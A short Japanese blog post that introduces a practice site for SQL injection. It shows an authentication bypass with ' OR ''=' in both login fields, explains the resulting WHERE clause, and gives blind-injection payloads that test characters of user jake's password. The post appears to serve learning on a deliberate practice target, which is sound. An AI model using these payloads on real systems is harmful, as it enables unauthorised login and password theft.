読者です 読者をやめる 読者になる 読者になる

プログラマーな日々

プログラマーをやっています。好きなツール:WorkFlowy、好きな言語:C#、好きなサービス:Backlog、好きなAWS:AWS Lambda。

SQLインジェクションを試せるサイト「SQL Injection Attack」

Webサイト

SQLインジェクションを試せるサイト「SQL Injection Attack」を紹介します。
SQL Injection Attack

試してみます


以下を入力します。

name
' OR ''='
password
' OR ''='



[送信]をクリックします。



ログインできてしまいました。

どうして?

WHERE句が以下になるからですね。

WHERE name='' OR ''='' AND password='' OR ''=''

他にも

jakeのパスワードに"w"が含まれることを確認する
name
jake
password
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '%w%') AND ''='
jakeのパスワードの3文字目が"w"であることを確認する
name
jake
password
' OR EXISTS(SELECT * FROM users WHERE name='jake' AND password LIKE '__w%') AND ''='